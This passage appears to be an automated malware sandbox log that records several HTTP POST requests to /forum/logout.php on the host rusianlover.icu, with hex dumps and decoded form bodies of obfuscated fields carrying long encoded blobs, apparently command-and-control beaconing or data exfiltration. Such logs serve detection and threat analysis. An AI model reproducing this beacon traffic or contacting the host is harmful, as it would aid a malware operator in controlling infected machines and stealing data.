31 32 32 44 41 32 41 30 39 41 38 34 35 33 36 30 30 36 36 42 33 41 39 32 34 32 34 42 33 34 33 39 34 36 46 44 38 46 44 42 36 46 35 37 30 31 35 44 31 42 32 35 38 46 43 41 44 39 37 36 33 42 46 36 34 39 38 33 35 35 33 32 34 35 45 36 31 35 41 43 31 32 33 38 38 31 30 30 44 46 43 45 39 33 38 44 34 38 31 32 46 42 31 45 34 39 42 31 36 46 43 34 44 43 34 41 41 46 43 46 34 34 37 46 39 43 42 35 38 36 30 42 42 41 46 43 38 35 42 32 32 41 32 43 30 32 36 43 31 31 41 38 30 36 34 43 32 42 32 32 32 38 45 30 34 34 45 36 37 41 31 30 39 45 31 41 37 30 37 39 39 35 45 36 38 38 36 41 44 38 39 
36 31 38 43 39 34 36 32 30 42 39 39 35 34 30 43 43 34 31 41 32 37 44 42 41 45 32 30 44 42 43 38 33 34 37 36 34 36 36 42 45 30 42 32 44 32 46 30 31 39 34 33 30 46 34 31 46 42 31 45 41 36 46 33 33 35 43 38 46 32 39 30 44 37 45 43 39 36 39 45 Data Ascii: vwxytuvwr=69166571&xadgd=6d67d2663745a2cc272d15ee18&zejonsx=2F10058259424B249953B92A2E81234AC3E3A535B72B9DFC929EBD83CEF86D492186EEADAA463C1F17627F92457B1BC44FBE3D00C3AA00B1FBDA95DF41598AF2398FBC7EB263B39C29487C4E0FC1432D44DEEC740C6923FF6EAD3D40D91DC58C68D16BBC6F266B79CCC251E7CA5B0C983440C11423032CF436BF887528730FF21AB7E928CCB48DFE2FA3EB6443746082E59513B24CBC30C2A2F301D6F122DA2A09A845360066B3A92424B343946FD8FDB6F57015D1B258FCAD9763BF64983553245E615AC12388100DFCE938D4812FB1E49B16FC4DC4AAFCF447F9CB5860BBAFC85B22A2C026C11A8064C2B2228E044E67A109E1A707995E6886AD89618C94620B99540CC41A27DBAE20DBC83476466BE0B2D2F019430F41FB1EA6F335C8F290D7EC969E
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=2140088 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 679Cache-Control: no-cacheData Raw: 6f 69 63 77 71 6b 3d 32 39 34 33 35 31 36 32 26 71 6d 69 65 61 77 73 69 3d 35 33 65 39 36 35 66 38 32 33 38 36 66 64 34 38 66 38 30 35 35 33 63 31 65 31 30 66 36 64 38 65 31 35 37 37 65 36 31 32 30 64 36 39 31 35 61 32 31 39 36 66 63 31 66 32 38 66 32 61 33 38 38 64 26 73 71 6f 6d 3d 41 44 41 32 46 44 34 36 34 38 43 43 36 36 46 37 33 36 45 45 42 42 42 42 33 35 30 35 32 31 36 39 31 31 34 31 43 37 43 39 44 44 35 38 46 38 44 30 31 42 43 39 37 32 30 46 33 37 46 30 30 44 42 30 41 39 42 30 44 38 37 41 36 45 44 38 46 41 37 44 39 30 39 41 35 31 39 34 41 31 36 33 32 33 31 42 33 35 46 35 43 41 46 31 37 35 30 45 31 31 36 41 41 39 42 43 44 32 35 37 36 41 31 34 42 39 32 36 44 32 46 46 36 36 44 42 35 35 38 44 30 41 36 39 33 43 43 35 39 39 30 42 35 41 39 36 32 32 34 45 46 31 34 43 42 39 38 31 33 37 31 30 38 37 30 39 33 33 42 30 38 33 43 44 42 39 32 46 30 32 43 39 44 41 35 43 34 32 42 32 43 46 39 45 30 39 44 33 36 35 34 42 43 35 44 41 42 39 41 34 32 37 41 37 36 35 44 45 43 46 45 42 33 39 42 33 41 34 37 31 45 42 32 38 37 38 30 34 33 33 38 31 31 33 31 36 43 32 34 46 44 42 35 34 42 32 46 38 38 46 45 35 33 31 33 42 35 45 41 30 37 36 45 35 44 41 44 41 38 38 39 33 39 31 45 35 46 34 35 31 30 35 37 45 43 44 38 33 38 31 38 32 39 46 34 41 35 45 35 33 38 39 32 45 30 35 38 37 37 46 32 31 32 37 41 36 32 33 46 43 38 42 45 38 30 43 34 41 43 37 35 45 35 32 33 36 38 42 42 44 31 30 41 34 31 35 31 34 37 42 36 35 38 35 31 41 38 43 38 30 33 42 34 35 41 43 37 30 31 32 34 42 32 32 39 37 32 34 35 35 43 37 38 43 34 36 44 43 45 32 31 34 39 39 33 31 31 46 45 44 38 45 36 38 33 31 35 33 42 44 41 33 38 34 30 41 44 41 44 46 33 38 33 39 34 45 42 35 37 32 36 33 37 36 46 38 45 30 33 46 30 32 46 38 36 43 35 38 
46 36 35 39 33 39 31 46 43 39 31 34 39 44 39 38 41 34 38 41 33 42 31 38 43 35 39 32 45 36 44 46 44 36 42 36 38 45 43 38 36 35 36 37 34 46 45 44 38 31 46 32 39 41 36 34 37 46 38 33 43 30 36 34 42 42 34 33 34 44 37 31 32 42 35 32 33 34 33 34 42 36 32 35 39 46 34 46 45 36 35 36 41 30 44 37 33 30 30 45 36 30 37 39 41 31 36 45 36 35 38 32 39 43 46 37 Data Ascii: oicwqk=29435162&qmieawsi=53e965f82386fd48f80553c1e10f6d8e1577e6120d6915a2196fc1f28f2a388d&sqom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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=9885598 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 646Cache-Control: no-cacheData Raw: 7a 65 6a 6f 74 3d 35 39 39 37 35 34 38 35 26 62 69 70 77 64 6b 72 3d 43 45 33 42 36 34 37 42 32 45 41 35 41 36 31 43 31 31 37 31 46 30 32 44 39 37 34 32 26 64 6d 76 65 6e 77 66 6f 78 3d 35 46 33 30 41 46 45 41 30 39 43 44 38 33 42 38 43 32 44 35 34 38 45 30 35 38 31 39 46 45 43 44 33 37 41 34 33 30 38 43 43 36 42 30 43 34 42 39 36 44 45 32 31 38 30 45 38 35 34 32 45 45 35 31 43 30 39 46 46 32 37 44 45 46 37 30 36 32 45 34 43 44 30 37 43 36 33 45 45 33 46 37 39 35 46 38 37 37 33 42 35 35 37 41 45 42 38 39 46 33 46 46 41 38 44 36 37 44 31 42 46 43 36 32 36 37 33 44 30 33 37 39 46 36 42 37 38 34 34 33 43 35 41 31 46 46 30 44 30 34 37 36 35 34 36 43 41 35 30 37 46 33 43 41 44 37 36 33 35 46 45 35 37 43 41 35 43 45 39 37 38 46 42 41 30 37 36 30 45 37 45 38 42 41 42 36 32 43 35 39 42 32 37 45 33 44 36 45 37 41 36 38 42 41 39 45 38 34 37 42 35 42 32 30 42 37 43 41 44 36 37 45 39 41 35 43 44 45 35 45 37 37 35 43 45 39 35 45 34 39 46 46 36 39 31 35 36 30 46 31 38 38 46 44 30 35 45 32 35 42 44 42 35 39 37 32 33 41 36 35 34 41 33 32 30 44 41 39 42 39 37 41 42 30 44 34 43 35 35 45 36 43 32 34 31 38 33 42 41 36 33 36 36 45 44 42 39 30 44 46 41 38 39 41 31 45 32 44 37 35 32 33 30 36 38 46 30 32 41 32 46 37 37 42 31 43 33 35 39 45 31 33 37 32 34 36 42 41 30 36 35 32 34 46 46 37 46 34 44 44 39 36 44 32 45 44 43 41 33 43 37 32 30 43 41 37 43 32 32 46 30 46 34 44 46 33 45 35 44 37 35 32 37 45 44 30 34 41 39 33 33 31 42 44 44 34 31 44 31 36 30 45 39 36 45 32 33 44 35 34 45 46 37 32 43 36 43 46 38 44 38 33 37 45 32 43 31 46 30 44 33 32 35 36 42 30 35 41 45 31 45 41 34 32 42 37 44 44 30 46 34 34 38 30 41 36 41 38 42 46 41 32 36 39 31 43 33 44 31 38 44 38 34 36 31 46 32 36 38 33 37 
31 32 46 45 35 42 37 46 32 32 36 37 35 45 38 38 43 45 30 33 34 36 43 41 35 42 31 36 34 37 35 38 34 35 36 35 43 44 33 34 33 42 32 35 45 30 44 38 31 41 45 46 33 34 34 42 31 31 43 43 32 43 44 43 35 42 42 32 32 43 42 41 31 42 41 38 35 36 44 35 37 32 35 Data Ascii: zejot=59975485&bipwdkr=CE3B647B2EA5A61C1171F02D9742&dmvenwfox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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 692Cache-Control: no-cacheData Raw: 78 61 64 61 64 67 6a 3d 45 38 33 30 42 44 43 36 43 34 46 37 36 46 33 35 42 35 45 33 39 45 33 31 38 41 37 38 45 32 31 30 32 37 41 30 38 35 31 31 41 35 30 35 42 30 31 34 42 41 34 42 33 45 33 43 36 37 37 46 36 46 36 45 33 46 45 45 30 44 46 32 35 33 26 76 77 78 73 74 3d 36 39 30 34 36 34 34 31 26 7a 65 6a 69 6e 73 78 77 62 3d 30 38 63 30 66 39 37 33 32 65 64 65 63 37 37 64 30 33 64 63 64 65 39 30 65 36 63 38 34 32 35 34 36 35 34 63 37 31 31 35 33 62 63 62 30 39 33 62 30 63 62 63 62 63 39 30 62 36 35 65 62 63 32 35 33 62 34 38 65 37 63 66 63 36 37 63 63 38 31 34 36 32 37 31 32 36 32 37 30 36 35 36 66 36 37 36 35 34 35 62 63 30 38 34 62 32 38 35 30 31 32 35 64 31 62 38 61 39 32 61 65 63 65 39 65 66 39 62 39 35 38 36 34 64 32 66 61 65 33 31 39 64 64 33 62 39 38 36 61 65 32 35 33 33 31 33 31 61 65 34 61 34 64 34 33 39 35 36 33 32 36 32 66 64 66 35 32 64 31 66 61 62 65 65 31 61 31 61 34 33 31 61 66 66 31 35 35 61 38 34 63 35 34 31 33 35 31 37 38 64 61 61 39 37 39 37 31 66 33 33 36 39 62 64 34 33 65 32 33 63 31 31 34 65 61 33 34 39 37 36 37 64 39 66 61 38 30 64 38 34 37 31 66 63 61 32 35 62 65 66 33 65 61 36 39 36 39 66 62 37 37 38 63 66 39 66 39 31 38 35 31 63 32 38 36 66 38 64 33 33 39 38 30 37 38 30 31 65 63 35 34 35 31 35 63 32 61 31 61 35 36 34 32 31 39 36 62 33 63 63 36 64 36 38 36 38 33 33 34 30 39 36 66 37 32 61 35 32 39 33 33 31 62 31 30 36 61 31 39 33 62 64 30 63 64 66 39 61 36 33 30 66 61 31 64 35 36 34 39 37 65 63 64 35 37 36 36 36 64 37 65 64 31 30 65 63 61 33 64 35 36 61 38 39 63 33 39 66 63 62 37 66 36 32 61 34 32 32 33 31 63 31 33 62 31 31 66 61 32 31 63 39 62 64 36 38 34 36 34 31 33 34 34 33 30 64 63 62 37 38 34 32 64 37 64 37 37 63 35 38 34 32 62 35 66 33 39 63 35 
39 39 38 36 62 34 35 62 63 34 37 62 31 61 63 38 33 61 34 34 33 63 32 64 30 33 31 38 62 65 37 63 63 38 62 31 30 31 34 64 34 31 66 37 34 33 31 39 63 36 38 66 35 61 30 30 33 65 34 64 64 32 39 30 33 36 33 66 37 33 32 63 33 36 66 63 66 66 64 36 35 32 34 33 34 65 66 63 30 30 63 36 37 37 33 32 39 63 37 64 65 36 64 39 34 31 37 64 32 36 33 64 37 34 33 65 64 39 62 30 62 38 61 35 32 Data Ascii: xadadgj=E830BDC6C4F76F35B5E39E318A78E21027A08511A505B014BA4B3E3C677F6F6E3FEE0DF253&vwxst=69046441&zejinsxwb=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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?page=1 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 635Cache-Control: no-cacheData Raw: 73 71 6f 6d 6b 69 61 79 3d 37 32 36 63 39 34 31 65 32 34 35 64 65 39 36 36 64 38 64 65 26 71 6d 69 65 61 77 3d 34 37 33 36 33 31 33 38 26 75 75 75 75 3d 32 36 36 44 44 30 36 43 42 37 42 36 39 43 38 35 43 31 32 34 41 33 31 33 38 30 34 32 38 31 46 35 45 45 31 46 39 36 35 46 32 37 42 46 37 44 46 45 31 39 38 37 35 37 43 42 43 36 43 46 38 45 34 33 41 46 41 41 36 38 34 43 35 41 43 46 30 38 44 35 36 34 37 31 31 35 36 46 39 38 30 38 46 46 36 39 33 30 43 42 39 32 43 36 31 37 45 39 30 33 30 42 31 36 42 31 41 41 45 43 33 33 31 37 30 33 35 32 37 33 33 31 36 38 37 44 31 42 42 35 31 39 35 30 44 33 44 36 37 37 37 32 35 45 32 34 30 36 33 32 34 45 46 37 42 37 38 46 46 34 41 35 32 37 41 38 37 45 42 46 39 44 46 45 35 30 35 39 46 42 33 35 34 38 32 44 39 30 30 31 35 41 32 35 39 41 31 36 38 35 36 37 43 38 32 45 38 35 42 43 32 41 36 37 30 44 46 32 45 46 39 39 31 31 45 36 41 41 45 33 37 37 30 30 31 42 33 35 34 30 41 39 46 38 35 45 38 30 36 37 43 31 42 45 41 31 32 30 34 38 45 35 32 39 45 41 41 46 35 41 46 42 34 35 33 30 42 35 32 32 45 31 33 44 30 35 45 43 39 46 32 36 33 34 41 30 44 38 34 30 38 31 41 39 34 46 42 42 42 39 44 32 41 35 30 32 41 41 37 44 30 41 35 34 32 41 32 32 37 30 34 35 43 46 35 39 46 45 37 38 35 46 36 30 34 39 46 45 41 38 46 34 35 36 38 31 30 38 34 32 30 43 36 33 38 43 35 42 31 44 42 45 42 33 34 46 35 31 46 33 41 37 31 35 44 35 35 33 31 42 38 30 45 45 45 35 45 37 35 30 46 35 41 33 32 37 30 44 32 45 44 34 30 38 42 30 31 34 39 43 30 45 32 46 37 38 31 30 43 34 39 30 30 42 35 43 45 39 30 33 45 37 42 44 43 32 36 41 39 35 30 33 32 32 37 41 46 33 33 41 38 34 38 38 41 41 35 37 36 32 34 42 42 33 46 34 30 45 45 42 43 30 34 34 35 44 41 45 33 32 46 41 36 38 33 39 41 42 34 44 39 35 46 
44 43 34 34 44 37 45 34 44 44 43 43 45 32 34 41 46 33 41 33 41 43 33 37 44 46 42 34 30 42 36 33 36 39 43 32 33 35 41 39 46 37 39 38 35 43 31 41 32 43 32 35 39 38 32 41 30 32 42 38 44 41 41 36 34 43 43 32 31 41 31 Data Ascii: sqomkiay=726c941e245de966d8de&qmieaw=47363138&uuuu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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 649Cache-Control: no-cacheData Raw: 6f 63 71 65 73 67 75 69 3d 44 38 31 32 42 33 42 30 45 41 33 33 45 45 43 30 46 38 33 32 34 31 46 45 41 45 38 42 31 32 41 37 36 37 26 6d 79 6b 77 69 75 3d 35 35 33 32 30 31 31 36 26 71 67 77 6d 3d 34 44 31 42 43 33 36 35 36 35 39 38 30 42 32 43 34 41 31 45 38 42 35 46 43 30 36 44 45 43 32 41 46 38 41 38 38 33 37 36 43 30 41 43 31 39 38 34 34 43 44 38 41 43 37 33 38 37 34 43 44 41 32 34 31 44 35 34 34 33 34 38 33 37 33 35 44 31 46 37 34 30 33 31 30 32 35 45 41 39 30 44 38 37 33 37 46 35 38 35 41 31 35 30 43 35 34 34 46 42 31 43 33 38 35 36 30 36 43 42 45 34 32 43 46 43 46 32 39 38 33 39 32 46 38 44 42 43 37 30 43 37 37 31 38 36 35 36 45 36 41 41 32 44 45 34 41 44 30 46 41 30 33 45 31 30 31 35 36 32 34 43 37 31 46 33 41 32 44 34 39 30 43 32 36 42 43 39 39 46 39 31 42 32 43 39 32 37 43 43 33 38 39 46 30 39 35 43 44 35 34 38 37 33 34 36 38 42 39 42 37 45 41 33 30 36 44 39 39 36 36 39 37 30 43 30 37 32 41 38 35 45 39 32 41 34 38 33 36 43 33 30 39 41 42 45 43 45 41 38 38 44 44 45 41 46 37 30 37 46 38 41 33 38 34 43 33 44 36 30 45 31 35 37 43 35 31 39 34 38 32 35 38 30 37 37 33 41 32 38 37 31 34 33 39 32 38 42 32 35 31 44 39 46 34 39 35 34 35 36 44 39 32 31 30 46 36 30 39 32 37 42 36 45 46 43 34 38 36 45 33 42 37 38 31 46 41 41 42 33 32 34 46 42 45 41 46 31 46 32 33 31 46 30 33 37 43 33 34 33 31 46 41 36 36 36 39 44 45 46 31 46 42 31 41 32 41 30 36 46 35 36 37 38 44 41 36 44 44 36 41 31 42 31 41 34 36 33 43 37 37 38 43 44 38 46 44 33 34 30 42 43 44 37 33 41 39 43 35 32 44 41 36 37 34 35 44 30 35 31 38 35 45 38 34 38 33 46 30 36 41 41 36 32 44 36 41 37 30 45 43 31 45 39 30 41 43 33 44 35 31 45 41 32 31 44 44 41 31 46 30 41 33 33 31 45 44 41 36 39 33 38 38 42 39 38 44 31 31 45 42 37 
41 37 44 43 44 30 30 37 42 37 35 34 36 42 45 45 34 39 45 45 41 35 33 34 39 38 44 45 31 45 45 34 39 32 36 46 41 35 43 43 38 43 46 37 39 44 31 30 39 44 38 42 39 36 33 33 34 38 35 37 32 45 42 30 30 43 32 30 37 42 33 34 42 44 38 37 34 42 37 35 36 37 Data Ascii: ocqesgui=D812B3B0EA33EEC0F83241FEAE8B12A767&mykwiu=55320116&qgwm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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 671Cache-Control: no-cacheData Raw: 73 6b 69 61 3d 32 34 44 46 46 32 37 35 37 46 43 35 45 32 34 38 32 43 36 32 42 36 36 45 39 46 32 44 33 45 44 36 37 30 34 43 38 39 31 45 32 30 33 46 45 41 37 44 46 46 42 30 42 38 36 32 26 71 67 63 73 69 65 75 71 3d 31 39 33 33 34 33 35 36 26 75 6f 6f 69 63 63 3d 33 45 36 37 38 39 37 46 42 31 45 39 43 45 32 31 34 41 41 36 37 32 41 32 31 42 35 38 35 41 34 42 39 32 34 37 33 37 34 31 37 34 46 44 34 38 45 32 32 34 44 45 31 33 30 38 37 44 41 33 44 44 32 45 45 39 35 43 41 41 35 42 44 31 37 30 43 39 32 31 39 37 42 32 30 31 41 38 34 43 41 36 44 36 31 42 45 45 31 36 45 38 43 46 33 44 39 42 33 34 46 35 35 45 34 43 37 34 38 43 45 42 41 43 37 39 34 34 34 38 43 46 45 44 39 33 43 39 35 30 42 32 36 34 32 39 46 36 39 43 41 38 39 36 46 44 36 35 35 42 38 37 30 44 32 37 42 38 32 35 34 38 41 32 46 44 34 44 37 44 44 32 32 33 35 34 39 32 37 36 37 36 42 45 43 32 41 30 36 30 37 39 46 32 38 42 44 33 32 45 32 39 44 33 34 44 35 31 32 34 43 37 46 34 42 38 37 38 45 32 45 32 35 35 35 33 38 41 38 32 45 45 33 39 39 41 32 44 46 44 38 31 36 46 46 39 42 38 35 31 31 43 35 30 34 45 36 46 39 30 34 33 33 45 31 36 38 41 34 43 36 34 42 31 32 45 44 45 44 45 31 32 32 31 41 46 39 34 41 42 35 41 43 43 36 41 30 45 32 33 32 36 43 34 31 37 37 32 39 43 37 34 38 39 32 36 32 39 35 41 41 43 45 41 34 46 46 34 43 32 46 38 39 36 43 30 39 32 38 45 43 42 38 41 44 45 41 43 34 30 39 34 46 37 45 43 43 43 31 38 35 45 37 36 38 37 39 31 37 38 45 46 45 42 37 34 35 37 45 41 45 36 34 44 41 45 37 33 33 32 33 38 33 41 44 43 34 32 34 33 34 42 32 39 46 44 35 41 32 30 37 39 41 31 33 35 38 34 34 37 35 31 43 36 31 38 36 46 43 34 45 33 37 37 34 45 34 46 34 36 44 38 46 44 41 43 41 34 33 37 41 39 33 42 43 32 36 45 44 32 45 43 37 30 44 30 39 43 45 34 
36 31 45 41 38 46 45 39 45 35 42 39 34 38 43 33 32 43 30 31 43 32 41 41 43 34 37 44 46 43 43 43 31 41 33 31 45 39 44 31 34 35 39 31 38 44 46 30 39 39 46 46 41 31 46 32 44 41 42 44 35 35 31 33 38 33 31 45 38 33 38 32 41 44 36 44 39 43 42 31 36 32 32 39 37 30 31 35 42 46 36 35 44 31 41 36 35 30 32 44 30 34 32 43 Data Ascii: skia=24DFF2757FC5E2482C62B66E9F2D3ED6704C891E203FEA7DFFB0B862&qgcsieuq=19334356&uooicc=3E67897FB1E9CE214AA672A21B585A4B9247374174FD48E224DE13087DA3DD2EE95CAA5BD170C92197B201A84CA6D61BEE16E8CF3D9B34F55E4C748CEBAC794448CFED93C950B26429F69CA896FD655B870D27B82548A2FD4D7DD22354927676BEC2A06079F28BD32E29D34D5124C7F4B878E2E255538A82EE399A2DFD816FF9B8511C504E6F90433E168A4C64B12EDEDE1221AF94AB5ACC6A0E2326C417729C748926295AACEA4FF4C2F896C0928ECB8ADEAC4094F7ECCC185E76879178EFEB7457EAE64DAE7332383ADC42434B29FD5A2079A135844751C6186FC4E3774E4F46D8FDACA437A93BC26ED2EC70D09CE461EA8FE9E5B948C32C01C2AAC47DFCCC1A31E9D145918DF099FFA1F2DABD5513831E8382AD6D9CB162297015BF65D1A6502D042C
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 7a 65 6a 69 6e 3d 37 46 43 31 41 31 39 33 36 39 36 35 31 42 38 41 44 37 41 42 33 31 37 33 34 31 32 31 30 38 44 46 42 45 34 43 30 42 33 36 31 46 34 37 34 44 37 45 37 43 35 45 36 44 26 78 61 64 61 64 67 6a 67 6a 3d 37 39 36 34 32 34 36 39 26 62 69 70 71 78 65 6c 3d 42 38 41 38 37 39 39 39 42 46 37 44 41 43 45 43 45 36 46 39 46 34 45 36 34 44 46 42 32 34 33 35 46 34 38 37 42 43 44 32 33 34 42 30 46 30 33 46 30 30 32 36 36 31 31 33 41 31 43 32 41 34 46 41 37 36 36 38 37 45 36 33 41 42 32 44 38 30 38 45 41 30 34 43 42 38 44 42 37 30 38 45 30 42 38 42 42 33 33 31 32 38 41 37 34 33 43 38 32 34 43 41 42 39 35 34 42 37 34 36 41 35 45 42 42 39 38 44 35 43 36 36 35 41 34 35 36 46 34 33 45 34 43 43 30 39 32 33 39 34 33 36 46 32 31 42 42 37 37 37 45 33 42 42 33 39 37 43 38 42 33 41 46 34 32 35 39 43 46 35 34 43 32 33 32 43 33 43 43 36 45 39 35 45 32 36 38 46 43 46 37 30 38 44 32 34 36 34 43 37 33 34 34 30 35 33 42 39 45 46 46 42 38 34 33 41 44 34 43 38 39 44 32 41 41 34 34 38 39 30 46 32 30 41 31 32 46 35 37 46 38 30 36 36 41 43 31 41 43 45 38 38 35 44 41 39 41 41 35 38 38 33 31 36 30 31 37 30 31 43 35 38 36 35 43 30 30 30 46 34 36 44 42 45 31 39 33 33 46 38 36 44 34 34 37 36 42 33 39 36 44 43 43 34 41 37 32 43 36 35 30 44 32 44 32 36 36 39 33 46 41 33 31 32 45 38 33 44 30 30 34 44 39 34 44 36 38 42 38 32 37 31 41 38 33 45 41 32 42 39 35 37 45 34 45 38 38 31 39 32 46 30 41 39 44 37 33 34 34 34 30 31 30 46 43 37 38 36 31 44 31 42 44 42 38 39 36 36 32 31 41 35 41 42 42 41 45 38 30 32 36 34 35 44 37 32 44 35 32 41 36 42 46 39 41 37 38 43 33 37 37 42 32 38 37 35 45 31 45 37 31 34 33 32 43 45 36 45 37 39 46 42 46 43 42 35 39 33 44 32 33 44 46 31 36 30 37 35 41 38 46 43 41 45 41 38 34 36 42 
35 41 33 45 41 39 38 35 44 32 43 32 46 37 41 34 45 42 37 45 35 36 35 41 33 41 46 45 46 45 46 30 36 35 36 37 32 30 35 41 31 41 39 39 42 30 31 43 30 43 42 43 43 30 46 44 43 37 43 38 36 46 46 46 32 39 37 37 45 39 37 30 45 46 43 31 42 34 33 41 30 32 32 45 37 46 45 41 45 41 31 30 31 44 42 43 30 41 33 39 45 39 41 35 43 Data Ascii: zejin=7FC1A19369651B8AD7AB3173412108DFBE4C0B361F474D7E7C5E6D&xadadgjgj=79642469&bipqxel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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=1106076 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 637Cache-Control: no-cacheData Raw: 73 71 6f 6d 6b 69 3d 38 65 30 62 38 33 64 33 35 62 64 38 32 35 61 65 32 66 37 34 37 33 26 71 6d 69 65 3d 37 38 31 33 37 37 33 36 26 75 75 75 75 75 75 75 75 3d 37 63 66 65 66 38 62 64 62 34 38 66 63 37 32 32 61 34 61 30 65 31 38 33 30 62 36 64 38 34 63 62 66 31 36 61 62 37 66 63 66 37 36 61 61 64 38 37 35 39 61 30 61 38 61 31 32 34 30 37 35 32 38 37 66 34 62 36 32 38 33 35 62 31 62 30 64 66 33 61 63 64 65 34 66 33 63 65 38 30 38 66 65 36 34 30 38 39 64 33 36 34 32 62 38 39 65 66 63 32 38 37 30 61 37 33 61 38 30 31 63 31 37 64 36 30 32 37 61 65 35 65 33 31 30 63 64 63 33 39 64 64 61 62 35 65 62 32 62 38 64 62 34 65 31 65 30 37 32 64 39 33 38 66 36 30 35 64 66 31 32 65 61 65 38 38 30 36 37 63 62 37 34 30 62 30 32 61 66 31 64 39 61 64 65 38 34 62 36 35 34 66 64 38 63 34 35 33 64 35 38 61 37 37 39 32 38 64 31 30 63 63 37 39 36 36 64 37 66 31 36 33 31 37 36 32 65 66 65 36 63 31 64 35 66 66 35 32 37 63 31 31 65 63 37 30 65 36 33 65 39 37 38 30 37 39 66 37 66 30 30 36 37 35 66 36 38 38 61 66 65 62 65 61 64 30 39 66 31 30 37 65 66 39 32 32 34 61 65 30 37 33 38 66 35 37 37 66 64 63 31 37 33 65 37 64 32 33 37 61 65 39 37 32 65 65 38 31 66 62 39 39 33 30 65 64 35 65 62 33 66 33 63 33 65 66 65 65 65 38 34 34 62 33 66 39 38 65 61 65 66 39 35 37 39 62 35 62 33 64 35 39 37 64 33 37 66 37 31 38 32 64 38 62 32 32 66 32 31 36 30 38 34 37 37 34 65 39 35 34 62 34 37 34 31 32 62 38 33 34 61 34 64 30 62 31 63 35 34 38 32 62 30 66 39 38 38 36 65 30 31 39 30 36 30 33 32 30 38 39 63 63 61 62 39 31 65 63 35 62 33 66 31 38 66 37 63 38 65 34 63 37 32 35 64 33 65 31 62 33 38 63 32 39 63 39 66 63 33 35 66 39 35 65 65 63 36 32 35 64 62 39 38 30 65 61 35 31 63 64 37 64 64 38 39 34 33 30 37 61 
62 63 32 34 62 32 66 30 32 62 39 36 63 65 39 36 66 36 37 64 61 62 31 61 39 61 37 61 65 36 35 31 32 33 64 63 33 66 31 32 66 32 38 35 30 30 61 36 30 38 62 62 30 35 63 38 38 30 35 38 30 37 37 36 36 66 63 30 63 39 37 35 38 30 Data Ascii: sqomki=8e0b83d35bd825ae2f7473&qmie=78137736&uuuuuuuu=7cfef8bdb48fc722a4a0e1830b6d84cbf16ab7fcf76aad8759a0a8a124075287f4b62835b1b0df3acde4f3ce808fe64089d3642b89efc2870a73a801c17d6027ae5e310cdc39ddab5eb2b8db4e1e072d938f605df12eae88067cb740b02af1d9ade84b654fd8c453d58a77928d10cc7966d7f1631762efe6c1d5ff527c11ec70e63e978079f7f00675f688afebead09f107ef9224ae0738f577fdc173e7d237ae972ee81fb9930ed5eb3f3c3efeee844b3f98eaef9579b5b3d597d37f7182d8b22f216084774e954b47412b834a4d0b1c5482b0f9886e01906032089ccab91ec5b3f18f7c8e4c725d3e1b38c29c9fc35f95eec625db980ea51cd7dd894307abc24b2f02b96ce96f67dab1a9a7ae65123dc3f12f28500a608bb05c8805807766fc0c97580
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=3125771 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 665Cache-Control: no-cacheData Raw: 77 73 6f 6b 6d 69 3d 33 38 34 31 31 32 46 42 38 43 45 30 39 35 42 34 45 46 37 34 44 46 35 33 32 43 37 46 45 35 34 41 44 42 30 30 33 38 34 31 42 38 37 38 34 42 44 35 41 34 26 75 6f 69 63 3d 39 34 35 34 33 34 37 36 26 79 77 75 73 77 75 73 71 3d 34 37 44 39 45 31 39 44 31 39 42 43 30 37 45 33 42 43 41 30 42 41 37 31 39 42 31 42 45 30 46 32 31 45 43 36 33 33 31 30 34 30 46 39 38 46 43 46 32 34 30 42 33 34 46 46 38 30 36 44 34 43 37 39 36 31 31 35 33 34 45 43 41 36 41 35 39 44 46 33 39 34 33 39 46 41 46 38 45 42 31 33 34 41 32 33 37 32 42 42 37 43 30 33 30 32 41 37 38 33 32 42 37 42 42 43 45 32 38 42 35 36 39 37 38 30 39 44 30 37 31 35 35 33 44 31 35 36 45 39 36 44 42 42 45 32 38 46 39 35 42 30 30 45 35 41 41 43 30 32 43 39 38 35 41 30 35 33 34 33 41 34 44 35 36 33 36 43 32 35 37 35 38 43 42 31 38 38 36 34 43 35 38 44 38 33 42 43 33 46 34 33 45 38 33 39 32 38 32 41 38 42 45 46 45 37 46 37 36 31 46 34 41 37 36 43 38 42 42 33 36 42 35 30 37 34 36 46 31 39 31 30 36 37 39 39 46 30 30 32 30 36 46 38 31 33 36 36 32 33 36 37 33 43 31 45 44 38 43 43 41 45 35 45 39 37 34 39 39 32 33 31 46 30 31 37 45 45 44 36 45 34 34 43 43 36 31 34 44 34 